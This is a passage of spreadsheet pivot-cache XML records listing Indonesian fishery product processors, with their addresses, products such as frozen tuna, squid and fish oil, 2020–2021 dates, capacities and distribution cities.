    <s v="PT. PATRIA PERIKANAN LESTARI INDONESIA"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21094"/>
    <x v="259"/>
    <s v="PT. SULTRATUNA SAMUDRA"/>
    <s v="Kompleks Pelabuhan Perikanan Samudera Kendari, Jl. Samudera No.1, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Mata Besar, Cakalang)"/>
    <d v="2020-06-23T00:00:00"/>
    <n v="1700"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21177"/>
    <x v="260"/>
    <s v="PT. SAMUDRA KENCANA MINA"/>
    <s v="Pergudangan Central Square Blok E 31, Jl. Ahmad Yani No.41-43, Kel. Keboansikep, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Patin, Nila, Gurami, Lele, Bawal)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Sidoarjo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21181"/>
    <x v="224"/>
    <s v="PT. BINA NELAYAN JAYA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Sorong, Jl. Cakalang, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layang, Tenggiri)"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21182"/>
    <x v="224"/>
    <s v="PT. BINA NELAYAN JAYA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Sorong, Jl. Cakalang, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demesal Beku (Lencam, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi)"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21183"/>
    <x v="224"/>
    <s v="PT. BINA NELAYAN JAYA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Sorong, Jl. Cakalang, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21184"/>
    <x v="224"/>
    <s v="PT. BINA NELAYAN JAYA"/>
    <s v="Kompleks Pelabuhan Perikanan Pantai Sorong, Jl. Cakalang, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Beku"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21195"/>
    <x v="424"/>
    <s v="PT. TRI SATRIA SAMUDRA"/>
    <s v="Jl. Sultan Hasanudin Kompleks Pelabuhan Perikanan Nusantara Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Beku (Lencam, Sebelah, Kerapu, Lidah, Kurisi, Ekor Kuning)"/>
    <d v="2020-07-07T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20283"/>
    <x v="425"/>
    <s v="SHIFODJI MANDIRI FOOD"/>
    <s v="Jl. Mulawarman Gang Kompas No.29-30 RT 015, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Abon Kepiting"/>
    <d v="2020-05-11T00:00:00"/>
    <n v="8400"/>
    <s v="Kota Balikpapan, Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="20284"/>
    <x v="425"/>
    <s v="SHIFODJI MANDIRI FOOD"/>
    <s v="Jl. Mulawarman Gang Kompas No.29-30 RT 015, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Amplang Ikan"/>
    <d v="2020-05-11T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Balikpapan, Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="20024"/>
    <x v="426"/>
    <s v="UD. HORAS BARU"/>
    <s v="Jl. Cendrawasih No.21, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Sarden, Layang, Cakalang)"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Tanjung Balai, Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="20710"/>
    <x v="417"/>
    <s v="SUMINI MISNU"/>
    <s v="Dusun Sido Mulyo RT 005, Kel. Kota Baru, Kec. Geragai, Kabupaten Tanjung Jabung Timur&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Naget Patin)"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="120"/>
    <s v="Kabupaten Tanjung Jabung Timur"/>
    <m/>
  </r>
  <r>
    <n v="20849"/>
    <x v="398"/>
    <s v="PT. GEMA MANGGALA CHEMINDO"/>
    <s v="Pergudangan Biz Point Blok Hokkaido No.60, Jl. Raya Pemda Tigaraksa, Kel. Sukamulya, Kec. Cikupa, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Minyak Salmon"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Timur, Kota Depok"/>
    <m/>
  </r>
  <r>
    <n v="21194"/>
    <x v="424"/>
    <s v="PT. TRI SATRIA SAMUDRA"/>
    <s v="Jl. Sultan Hasanudin Kompleks Pelabuhan Perikanan Nusantara Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-07-07T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat, Kota Ambon"/>
    <m/>
  </r>
  <r>
    <n v="19251"/>
    <x v="343"/>
    <s v="PT. CENTRALPERTIWI BAHARI"/>
    <s v="Jl. Rungkut Industri III No.81- 83, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="200000"/>
    <s v="Kabupaten Lampung Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21367"/>
    <x v="427"/>
    <s v="SUKMA"/>
    <s v="Jorong Setia Budi, Kel. Simalidu, Kec. Koto Salak, Kabupaten Dharmasraya&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Lele Asap"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="360"/>
    <s v="Kabupaten Dharmasraya"/>
    <m/>
  </r>
  <r>
    <n v="19436"/>
    <x v="428"/>
    <s v="PT. KLANGENAN MINA ARTHA"/>
    <s v="Dusun Ketawang RT 01 RW 01, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layang, Cakalang, Salem)"/>
    <d v="2020-01-20T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Trenggalek"/>
    <m/>
  </r>
  <r>
    <n v="19437"/>
    <x v="428"/>
    <s v="PT. KLANGENAN MINA ARTHA"/>
    <s v="Dusun Ketawang RT 01 RW 01, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Layur, Bawal, Kakap, Cunang)"/>
    <d v="2020-01-20T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Trenggalek"/>
    <m/>
  </r>
  <r>
    <n v="19438"/>
    <x v="428"/>
    <s v="PT. KLANGENAN MINA ARTHA"/>
    <s v="Dusun Ketawang RT 01 RW 01, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-01-20T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Trenggalek"/>
    <m/>
  </r>
  <r>
    <n v="20430"/>
    <x v="354"/>
    <s v="PT. SARIFEED INDOJAYA"/>
    <s v="Jl. Pelabuhan No. 35, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Minyak Ikan"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Banyuwangi"/>
    <m/>
  </r>
  <r>
    <n v="20432"/>
    <x v="295"/>
    <s v="PT. SARI LAUT JAYA LESTARI"/>
    <s v="Jl. Sampangan No.18, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Minyak Ikan"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="5000"/>
    <s v="Kabupaten Banyuwangi"/>
    <m/>
  </r>
  <r>
    <n v="21097"/>
    <x v="281"/>
    <s v="PT. BLAMBANGAN FOODPACKERS INDONESIA"/>
    <s v="Jl. Sampangan No. 1, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng, Makerel Kaleng"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="1490024"/>
    <s v="Kabupaten Aceh Timur"/>
    <m/>
  </r>
  <r>
    <n v="16913"/>
    <x v="232"/>
    <s v="PT. MARINA MAKMUR SEJAHTERA"/>
    <s v="Jl. Raya Salembaran Komplek Pergudangan Royal Kosambi Blok D6 RT 006 RW 003, Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Panni, Tongkol, Kembung, Kawabida, Salem)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="20479"/>
    <x v="429"/>
    <s v="GURIH DD"/>
    <s v="Jl. Baru RT 04, Kel. Kurau Barat, Kec. Koba, Kabupaten Bangka Tengah&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Getas Ikan, Getas Cumi-cumi"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Pangkal Pinang"/>
    <m/>
  </r>
  <r>
    <n v="20480"/>
    <x v="429"/>
    <s v="GURIH DD"/>
    <s v="Jl. Baru RT 04, Kel. Kurau Barat, Kec. Koba, Kabupaten Bangka Tengah&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Stik Ikan, Stik Udang"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Pangkal Pinang"/>
    <m/>
  </r>
  <r>
    <n v="20606"/>
    <x v="389"/>
    <s v="PT. DKSH INDONESIA"/>
    <s v="IDS DSC MED Center Jln. Jawa Blok A1 MM2100 Industrial Estate Cibitung, Desa Mekarwangi, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Flakes Rumput Laut, Tepung Rumput Laut"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="16707"/>
    <x v="343"/>
    <s v="PT. CENTRALPERTIWI BAHARI"/>
    <s v="Jl. Rungkut Industri III No.81- 83, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Gurame, Bandeng, Patin)"/>
    <d v="2020-04-20T00:00:00"/>
    <n v="860000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="16708"/>
    <x v="343"/>
    <s v="PT. CENTRALPERTIWI BAHARI"/>
    <s v="Jl. Rungkut Industri III No.81- 83, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Bakso Udang, Tofu, Siomay, Cutlet, Naget, Udang Bungkus, Udang Berlapis Tepung, Ikan Berlapis Tepung, Roll Udang) "/>
    <d v="2020-04-20T00:00:00"/>
    <n v="480000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="17230"/>
    <x v="421"/>
    <s v="PT. PUTRI GUMILANG SEJAHTERA"/>
    <s v="Jl Ringroad Dusun Pereng RT 001 RW 007, Kel. Gendong Kulon, Kec. Babat, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-01-27T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Lamongan"/>
    <m/>
  </r>
  <r>
    <n v="17283"/>
    <x v="430"/>
    <s v="CV, MAJU MAKMUR SAMUDRA"/>
    <s v="Pasar Ikan Blok I No,65-68 Pelabuhan Perikanan Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Layur, Bawal, Kakap, Ekor Kuning)"/>
    <d v="2020-03-09T00:00:00"/>
    <n v="7000000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="17285"/>
    <x v="430"/>
    <s v="CV, MAJU MAKMUR SAMUDRA"/>
    <s v="Pasar Ikan Blok I No,65-68 Pelabuhan Perikanan Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-09T00:00:00"/>
    <n v="7000000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="17286"/>
    <x v="430"/>
    <s v="CV, MAJU MAKMUR SAMUDRA"/>
    <s v="Pasar Ikan Blok I No,65-68 Pelabuhan Perikanan Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Salem, Banjar, Tenggiri, Cunang)"/>
    <d v="2020-03-09T00:00:00"/>
    <n v="7000000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="17875"/>
    <x v="431"/>
    <s v="PT. CHARLY WIJAYA TUNA"/>
    <s v="Jl. Muara Baru Ujung, Pelabuhan Muara Baru Blok K.7C, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku Untuk Umpan (Sarden, Salem)"/>
    <d v="2020-02-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19480"/>
    <x v="432"/>
    <s v="PT. JASPO INTERNASIONAL PRATAMA"/>
    <s v="Jl. Kapuk Kamal Muara VII No.73 (Room 5), Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19481"/>
    <x v="432"/>
    <s v="PT. JASPO INTERNASIONAL PRATAMA"/>
    <s v="Jl. Kapuk Kamal Muara VII No.73 (Room 5), Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19800"/>
    <x v="124"/>
    <s v="PT. WINDUBLAMBANGAN SEJATI"/>
    <s v="Jl. Gatot Subroto Km 5 No.18, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Lencam, Biji Nangka, Layur, Kakatua, Kakap, Kaci-kaci, Ekor Kuning)"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="152128"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19801"/>
    <x v="124"/>
    <s v="PT. WINDUBLAMBANGAN SEJATI"/>
    <s v="Jl. Gatot Subroto Km 5 No.18, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Teri, Baby Tuna, Lemuru, Tongkol, Cobia, Kembung, Layang, Goby)"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="253416"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19802"/>
    <x v="124"/>
    <s v="PT. WINDUBLAMBANGAN SEJATI"/>
    <s v="Jl. Gatot Subroto Km 5 No.18, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Scombroid Beku"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="158261"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19870"/>
    <x v="381"/>
    <s v="PT. KUNIMOTO FOODS"/>
    <s v="Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar, Abalone Segar"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="350"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="19875"/>
    <x v="381"/>
    <s v="PT. KUNIMOTO FOODS"/>
    <s v="Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Righteye Flounder)"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="19957"/>
    <x v="432"/>
    <s v="PT. JASPO INTERNASIONAL PRATAMA"/>
    <s v="Jl. Kapuk Kamal Muara VII No.73 (Room 5) , Kel. Kamal Muara , Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19983"/>
    <x v="433"/>
    <s v="CV. SAKANA INDO PRIMA"/>
    <s v="Parung Poncol RT 004 RW 002, Kel. Duren Mekar, Kec. Bojongsari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Siomay Ikan, Udang Gulung, Naget Ikan, Kekian, Otak-otak Ikan, Kaki Naga, Lumpia Ikan, Tempura Udang, Tuna Gulung, Pempek Ikan) "/>
    <d v="2020-06-09T00:00:00"/>
    <n v="946945"/>
    <s v="Kabupaten Karawang"/>
    <m/>
  </r>
  <r>
    <n v="20059"/>
    <x v="434"/>
    <s v="CV. USAHA SURYA DUA PUTHRA"/>
    <s v="Jl. Kurau RT 16 No.128, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Bandeng Beku"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="1900000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20155"/>
    <x v="237"/>
    <s v="PT. KIU KIU FISHERY"/>
    <s v="Jl. Tuna II Blok K 7 B Pelabuhan Perikanan Samudera Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Deho, Makerel, Sarden, Layang)"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="450000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="20174"/>
    <x v="435"/>
    <s v="PT. CLASSIC FINE FOODS INDONESIA"/>
    <s v="Komplek Pergudangan BGR, Jl. Boulevard BGR No.1, Kel. Kelapa Gading Barat, Kec. Kelapa Gading, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Jhon Dory, Dover Sole, Monkfish, Turbots, Patagonian, Toothfish, Seabrem, Hake, Pollock, Cod, Seabass)"/>
    <d v="2020-04-20T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20175"/>
    <x v="435"/>
    <s v="PT. CLASSIC FINE FOODS INDONESIA"/>
    <s v="Komplek Pergudangan BGR, Jl. Boulevard BGR No.1, Kel. Kelapa Gading Barat, Kec. Kelapa Gading, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tiram Beku, Abalone Beku"/>
    <d v="2020-04-20T00:00:00"/>
    <n v="17000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20177"/>
    <x v="435"/>
    <s v="PT. CLASSIC FINE FOODS INDONESIA"/>
    <s v="Komplek Pergudangan BGR, Jl. Boulevard BGR No.1, Kel. Kelapa Gading Barat, Kec. Kelapa Gading, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Beku"/>
    <d v="2020-04-20T00:00:00"/>
    <n v="800"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20178"/>
    <x v="435"/>
    <s v="PT. CLASSIC FINE FOODS INDONESIA"/>
    <s v="Komplek Pergudangan BGR, Jl. Boulevard BGR No.1, Kel. Kelapa Gading Barat, Kec. Kelapa Gading, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-04-20T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20209"/>
    <x v="12"/>
    <s v="CV. KING OF MILK FISH"/>
    <s v="Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20260"/>
    <x v="53"/>
    <s v="PT. UNITED OCEANS WORLDWIDE"/>
    <s v="Jl. Semampar No.1 Komplek Workshop PHPT Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20392"/>
    <x v="436"/>
    <s v="PT. TRIKO BINA NUSANTARA"/>
    <s v="Desa Dongkala, Kec. Pasarwajo, Kabupaten Buton&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap, Barramundi)"/>
    <d v="2020-05-18T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20395"/>
    <x v="436"/>
    <s v="PT. TRIKO BINA NUSANTARA"/>
    <s v="Desa Dongkala, Kec. Pasarwajo, Kabupaten Buton&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap, Barramundi)"/>
    <d v="2020-05-18T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20397"/>
    <x v="436"/>
    <s v="PT. TRIKO BINA NUSANTARA"/>
    <s v="Desa Dongkala, Kec. Pasarwajo, Kabupaten Buton&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2020-05-18T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20508"/>
    <x v="437"/>
    <s v="PT, BUDI SENTOSA ABADI"/>
    <s v="Jl, Samuel Languyu No,10, Kel, Aertembaga I Lingkungan II, Kec, Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang)"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20509"/>
    <x v="437"/>
    <s v="PT, BUDI SENTOSA ABADI"/>
    <s v="Jl, Samuel Languyu No,10, Kel, Aertembaga I Lingkungan II, Kec, Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Layang, Cakalang)"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20534"/>
    <x v="137"/>
    <s v="PT. OSEANIK NUSA GLOBAL"/>
    <s v="Jl. Husein Sastranegara Komplek Pergudangan Nusa Indah Room CS-4A Blok B/37 RT 004 RW 003, Kel. Jurumundi, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakatua, Bawal, Kakap)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20574"/>
    <x v="438"/>
    <s v="CV. KARUNIA INDO BAHARI"/>
    <s v="Jl. Dumais Lingkungan II, Kel. Girian Bawah, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Tongkol, Layang)"/>
    <d v="2020-04-27T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20748"/>
    <x v="439"/>
    <s v="CV. INDOMINA CIPTA SEJAHTERA"/>
    <s v="Jl. Yos Sudarso No.8, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20749"/>
    <x v="439"/>
    <s v="CV. INDOMINA CIPTA SEJAHTERA"/>
    <s v="Jl. Yos Sudarso No.8, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Bandeng Beku"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20750"/>
    <x v="439"/>
    <s v="CV. INDOMINA CIPTA SEJAHTERA"/>
    <s v="Jl. Yos Sudarso No.8, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Ikan Pelagis Beku (Tongkol, Nike, Layang)"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20752"/>
    <x v="439"/>
    <s v="CV. INDOMINA CIPTA SEJAHTERA"/>
